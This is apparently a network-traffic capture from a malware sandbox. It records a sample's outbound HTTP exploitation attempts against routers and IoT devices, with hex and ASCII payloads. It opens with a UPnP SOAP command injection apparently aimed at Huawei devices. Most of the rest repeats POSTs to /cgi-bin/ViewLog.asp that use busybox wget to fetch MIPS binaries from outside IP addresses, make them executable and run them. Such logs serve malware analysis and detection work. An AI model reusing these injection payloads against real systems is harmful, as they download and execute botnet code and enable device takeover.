                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              435192.168.2.145799295.164.37.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:32.724987030 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.270073891 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.441982985 CET113INHTTP/1.1 400 Bad Request
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              436192.168.2.144378231.136.2.1398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:32.730827093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.746634007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.890391111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.921892881 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.496916056 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              437192.168.2.145132662.238.20.68080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:33.133970976 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              438192.168.2.143930294.120.163.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:33.359344006 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              439192.168.2.145133262.238.20.68080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:33.513560057 CET322INHTTP/1.0 400 Bad Request
                                              Server: httpd
                                              Date: Sun, 09 Jan 2011 23:05:25 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              440192.168.2.144659631.136.19.1458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:34.086900949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:34.658678055 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.778646946 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.050606012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.658343077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.621975899 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.305185080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              441192.168.2.144734631.136.95.2448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:34.088519096 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:34.658673048 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.810626984 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.306550026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.914361000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.129961967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.305176020 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              442192.168.2.143765694.134.40.1038080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:34.105232954 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
